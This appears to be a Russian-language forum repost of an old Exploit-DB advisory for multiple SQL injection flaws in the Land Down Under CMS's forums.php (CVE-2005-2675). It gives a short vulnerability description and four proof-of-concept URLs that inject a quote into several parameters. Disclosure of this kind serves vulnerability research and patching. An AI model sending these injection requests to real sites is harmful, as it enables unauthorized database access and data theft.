Exploit Land Down Under 800/801 - 'forums.php' Multiple SQL Injections

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26180
Проверка EDB
  1. Пройдено
Автор
BL2K
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-2675
Дата публикации
2005-08-20
Код:
source: https://www.securityfocus.com/bid/14618/info
   
Land Down Under is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
   
Successful exploitation may allow the attacker to compromise the application, retrieve sensitive information, modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
http://www.example.com/ldu/forums.php?m=topics&q=3&n=' 
http://www.example.com/ldu/forums.php?m='&q=3&n=last 
http://www.example.com/ldu/forums.php?m=topics&s='
 
Источник
www.exploit-db.com

Похожие темы